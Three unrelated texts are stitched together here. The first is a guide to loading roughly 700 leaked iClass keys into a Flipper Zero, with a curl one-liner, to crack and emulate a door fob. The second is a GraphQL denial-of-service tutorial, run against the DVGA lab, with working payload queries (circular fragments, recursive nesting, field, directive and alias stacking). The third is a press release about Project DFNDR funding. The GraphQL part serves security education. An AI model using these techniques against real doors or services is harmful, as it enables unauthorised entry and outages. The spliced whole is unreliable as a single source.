When attempting an attack using the built in Elite Dict.Attack method found in the PicoPass application, only 25 or 28 keys are actually tried.

Updating the Keys file

On the version of Unleashed firmware that I’m running the key file for the dictionary attack is located at SD Card/apps_assets/picopass/iclass_elite-dict.txt

The actual contents of the file look like this. Although the screenshot above shows 28 keys being attempted, the file only contains 25, so we are not sure what the true number is.

The actual leak of the 700+ keys from iCopyX can be found here: https://pastebin.com/raw/KWcu0ch6

The original file as shown above is stored in this repo as iclass_elite_dict_original.txt, so if you want to restore it later you can simply rename this file to iclass_elite_dict.txt and copy it back to your Flipper Zero in the original location of SD Card/apps_assets/picopass/iclass_elite-dict.txt.

  1. Copy the file from the SD card. To do this you can either remove the SD card, use the qFlipper application, or just download the one attached to this repo.
  2. Copy all of the keys from the pastebin link above and paste them into the file you downloaded (or append them with the one-liner shown after this list). I put them after the key C1B74D7478053AE2 but I'm not sure it would really matter.
  3. Your key file should look like the below screenshot.
  4. Now just use your preferred method to transfer this file back to the Flipper. If you are using qFlipper you may have to delete the original file first.
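If you would rather script step 2 than copy and paste by hand, appending the leaked keys to the copied file is a one-liner (adjust the filename to match the file you pulled off the SD card):

curl -s https://pastebin.com/raw/KWcu0ch6 >> iclass_elite-dict.txt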

Attack with extra keys

After re-running the attack many more keys are shown to be tried.

After very quickly trying 300-odd keys, the correct one was found.

From here I was able to save the key.

As I understand it, it is not possible to write the key to another blank key fob; however, I was able to successfully emulate the key fob using the Flipper Zero and have it open the door.


Causing Service Degradation within GraphQL

This article will focus on causing a service degradation and denial of service attacks using quirks that are part of the GraphQL specification by design.

For these exercises we will use the Damn Vulnerable GraphQL Application (DVGA). If you wish to follow along, we recommend using the Docker instance, otherwise you risk triggering a DoS against yourself!

DoS on APIs? Surely rate limiting will solve this?

Unfortunately, rate limiting will do nothing to prevent these types of attacks. Unlike typical DoS/DDoS attacks, where a large volume of traffic is pointed at an endpoint with the intent of taking it offline, these are logic-based attacks that, if crafted appropriately, need only a single request to take the service offline. Given that a single request appears to be normal traffic to a rate-limiting appliance, it will not help here.

Infinite Loops: The Hidden Hazard of GraphQL Fragments

Fragments. A fantastic showcase of what can go wrong when well-meaning functionality is used in an unexpected manner. Essentially, they prevent you from having to individually type out the same subset of field names over and over in lengthy queries. Think of it like setting a bash alias for commands you run frequently. For more detail, check the Apollo documentation.

They are defined like so:

fragment NAMEYOUMADEUP on Object_type_name_that_exists {
field1
field2
}

This is a real example, from the example application used in this article:

fragment CommonFields on PasteObject {
title
content
}

When used, even though we have only put the fragment reference into the query, we can see the results are still retrieved.

It is important to note that the three periods prior to the fragment name are not filler. This is called the spread operator, and it is required when calling a fragment as part of a query.

You may have an idea what is coming next. What if we were to define two fragments, and have them call each other, like so?

query {
pastes {
...CommonFields
...TestFields
}
}

fragment CommonFields on PasteObject {
...TestFields
}

fragment TestFields on PasteObject {
...CommonFields
}

If you run this yourself, you will be very glad you ran it in Docker. The circular, unending and unresolvable nature of the query takes the instance down. A true denial of service, using a single query and a feature that is built into the GraphQL specification. The only information you need to perform this attack is the name of a single object type; we simply reuse PasteObject for both fragments, and that is enough to perform the attack.

This does not technically break any rules of the way GraphQL was designed, and the API developer has not done anything wrong in their implementation for this to occur. Mitigating it requires third-party frameworks such as GraphQL Shield to be installed, because as far as GraphQL is concerned, it is simply working by design in this instance.

GraphQL Recursive relationships

Using tools such as GraphQL Voyager, we are able to visualise relationships between objects in a schema.

This is a good tool for identifying recursive relationships, an indication that the developers have an issue with their business logic. Unlike circular fragments, these are not specification vulnerabilities; they are flaws introduced by the developers.

We can see that paste and pastes from the OwnerObject both reference PasteObject, whilst owner references OwnerObject.

Using this information, if we make a circular request like so:
query{
pastes{
owner{name}
}
}

This will return in a normal amount of time, as we aren't really doing anything wrong yet. The query can be stacked, however, which is perfectly valid since both objects reference one another, so we can craft it to keep passing the query back and forth.
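A truncated sketch of the shape of that request is below; the real payload simply repeats the owner/pastes pair until it is twenty levels deep.

query {
pastes {
owner {
pastes {
owner {
name
}
}
}
}
}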

With twenty stacked levels, the request now takes over a second. Doubling it again to 40 stacked queries, it takes over 5 minutes to get a response. In fact, it took so long that I killed the request, because the entire instance had become unusable. Pure service degradation, from a single query!

Field Duplication

This is a similar attack to the recursive query abuse, but instead of relying on the existence of bidirectional fields, which may not always be present, we simply include the same field from a valid query multiple times. And by multiple, I mean an extreme number of times.
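As a truncated sketch (the real payload repeats the duplicated field hundreds or thousands of times):

query {
pastes {
title
content
content
content
content
}
}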

A normal query for all pastes with their title and the contents of the pastes returns in 64ms from this screenshot.

But if I duplicate the content field one thousand times, it takes almost a full second.

And if I were to add it in 5,000 times, it takes over 13 seconds.

Unless the developer has implemented query cost analysis, this technique is inescapable for GraphQL. Nothing about it defies the GraphQL specification, and it is seen as a perfectly valid query by the server. Without an appliance that determines how costly a request will be prior to processing, rate limiting and traditional security mechanisms cannot prevent this type of attack.

As a real-world example, in 2019 GitLab discovered they themselves were vulnerable to this type of attack. https://gitlab.com/gitlab-org/gitlab/-/issues/30096

Introspection

Introspection is also vulnerable to circular issues, right out of the gate, anywhere it's enabled. As penetration testers, it is also good to note that the presence of introspection is a finding in and of itself.

Inside the __schema, we can request the types. This takes fields as an input, which can be given type as an input, which can be given fields as an input, which can be given type as an input, and so on and so forth. Below is a small proof of concept:

query {
__schema {
types {
fields {
type {
fields {
type {
fields {
name
}
}
}
}
}
}
}
}

To visualise what is happening here, let's send a normal query that is not trying to cause harm.

This returns in a normal amount of time, as it is a normal query.

What if I were to double the number of introspections?

We can see that it takes three times as long to do twice as much work. Something is certainly a bit wobbly here, and we can absolutely abuse this some more.

By sending a request with approximately twenty introspections, this now takes almost three seconds. We have absolutely proven service degradation can be caused with a single query.

Like circular fragments, this type of attack is GraphQL specification compliant. We are doing nothing here except (ab)using introspection in the way it was made. This is a very good reason why developers should disable introspection on all public GraphQL endpoints, because leaving it turned on allows this to occur.

Directive Stacking

As part of the GraphQL specification, there is no limit to the number of directives that can be applied to a field. The server must also process every directive given to it in order to determine whether it is a real or fictitious directive. This means that what we send for the server to process is inconsequential: it will still be processed, and we are still submitting perfectly valid queries that won't trigger any WAFs.
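As a truncated sketch; @anything is a made-up directive name, and the real payload repeats it thousands of times:

query {
pastes {
title @anything @anything @anything @anything
}
}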

As shown below I am sending approximately 100 fake directives to the endpoint, which takes almost 5 seconds to respond.

Adding 40,000 fake directives now makes responses return in over 50 seconds.

Whilst this returns a 400 because the directive is not real, it is not an improperly formatted request in the way a 400 from a REST API would otherwise indicate; the query strictly obeys all rules of the specification. The fact that we were able to increase the response time by a measurable amount shows this is a valid denial of service vector, despite the 400 responses.

Stacking queries with aliases

This is the last example, and it is a little funny. Before we get into it, it is important to know that the systemUpdate function on DVGA is designed to run for a random amount of time, so you may find your response times don't line up with the screenshots at all. But if you do the experiments, you will find that this vector does in fact work.

A series of stacked system updates takes 50 seconds in this screenshot. While this looks concerning, it is in fact in line with what that particular DVGA function does if it were run a single time.

30 seconds for a single query and 50 seconds for a stacked query must mean that it is in fact processing multiple times, but this is still in line with the variance that the function can give.

If we were to stack the queries with aliases however, like so:
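In outline (truncated here, with far fewer aliases than the real request), the query is simply the same field aliased over and over; DVGA exposes systemUpdate as a query field:

query {
q1: systemUpdate
q2: systemUpdate
q3: systemUpdate
q4: systemUpdate
}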

We can see it is taking almost 4 minutes to process. This is not expected behaviour from the function, and it indicates that we have been able to cause service degradation by triggering the function multiple times within a single query.

In summary

Hopefully this has been an illuminating article and gives some insight into the varied ways denial of service and service degradation can be caused without utilising high volumes of traffic against a GraphQL endpoint.


$6.4 Project DFNDR awarded federal funding as a Cooperative Research Centres Project

WEDNESDAY 13 MARCH 2024, CANBERRA ACT: Canberra-based cyber security company, Ionize, has been awarded a Federal Government Grant through the Cooperative Research Centres Projects (CRC-P) Round 15 opportunity to deliver Project DFNDR: Adaptive Cyber Security for Defence and Critical Infrastructure SMEs.

Project DFNDR will be delivered in partnership between Ionize, Cybermerc and the University of Canberra through a groundbreaking initiative dedicated to streamlining cyber threat detection, network defence, response and recovery for small to medium enterprises (SME). Project DFNDR will provide a quantifiable uplift to participating SMEs, through an integrated managed cyber security service and threat intelligence sharing platform.

With federal funding awarded through the Cooperative Research Centres Project, Andrew Muller CEO of Ionize sees Project DFNDR as tangible evidence of a partnership and solution approach within the cyber security industry. “Technological advancement and innovation cannot occur without strong partnerships across private enterprise, research institutions and government. For Australia to continue to be at the forefront of global innovation in cyber security, we need to collaborate across our industry and importantly with academia; advancing technological solutions is driven by data, analysis and lessons learned”.

A key element of Project DFNDR is an integrated managed security service with cyber threat intelligence sharing, delivering proactive and adaptive cyber defences. This creates a simple and effective measure to understand the cyber threat environment for an organisation. Matthew Nevin, CEO of Cybermerc encounters “the numerous security challenges faced by organisations every day. Project DFNDR aims to simplify and strengthen SMEs cyber security by providing a complete service across threat hunting, monitoring and intelligence to mitigate cyber attacks and share information on Advanced Persistent Threats.”

The rapid adoption of technology and its increasing use across all levels of personal and professional domains has undoubtedly expanded the surface for attacks. Dr Abu Barkat Ullah, Associate Professor Information Technology and Systems at the University of Canberra knows that “the ability to predict, prevent and identify cyber threats attempting to exploit networks is a valuable resource and academia and research have crucial roles to play in attaining this. Through our analysis and research of the telemetry provided by companies participating in Project DFNDR, researchers will have access to a significant data lake to support the development of an adaptive cyber security solution.”

Prioritisation for participation in the project will be given to companies operating within or delivering services to defence and critical infrastructure industries. As part of the project, companies that choose to participate will incur no costs during the proof of concept, which is expected to take between 12 and 15 months.
The objectives of the CRC-P program are to:
• improve the competitiveness, productivity and sustainability of Australian industries, especially where Australia has a competitive strength, and in alignment with government priorities;
• foster high-quality research to solve industry-identified problems through industry-led and outcome-focused collaborative research partnerships, especially involving research organisations; and
• encourage and facilitate small and medium enterprise (SME) participation in collaborative research.

Media Enquiries

E: ProjectDFNDR@ionize.com.au

About Ionize

Ionize was founded in 2008 with the simple belief that every organisation should be able to take their business into the digital realm with the confidence that their customers, employees and partners will have a secure experience.

For this belief to be realised we recognised that cyber security needed to move beyond annual security reviews and instead focus on building a full-spectrum security capability that delivers continuous business and security alignment – from governance & compliance through attack simulations through to remediation and engineering services.

We also understand that building and maintaining your own cyber security capability is hard – which is why we established Ionize HAWC Managed Cyber Security Services – including SOCaaS, CISOaaS and continuous, automated penetration testing services.

About Cybermerc

Cybermerc is an Australian company founded in 2016 by two brothers on a mission to forge a collective cyber defence for Australia and its partners, powered by a community of businesses, academia and government.

Cybermerc connects businesses together in a defensive collaboration against shared cyber threats specialising in:
• cyber security detection and protection for SMBs
• national Cyber Threat Intelligence Sharing Platform for government agencies
• Cyber Threat Assessments of organisations and
• cyber security and threat intelligence training to elevate organisational capability

About University of Canberra

The University of Canberra (UC) has its main campus located in Bruce, Canberra in the Australian Capital Territory. As a civic university in Australia’s capital, we work with government, business and industry to serve our community, region and nation, challenging the status quo in pursuit of innovative and high quality teaching, learning and research impact.

Located within the Faculty of Science and Technology, the School of Information Technology & Systems (IT&S) is at the forefront of Information Technology, Information Systems and Engineering. We ensure students are ready to enter the world’s most in-demand industries, with cutting edge specialisations designed in consultation with some of the world’s leading IT and engineering organisations. Our academic staff are renowned and respected educators, researchers and industry leaders, committed to sharing knowledge, skills, experience and professional connections. They provide graduates with learning experiences that reflect industry advancements and trends, as they hone their technical skillset in real world environments.
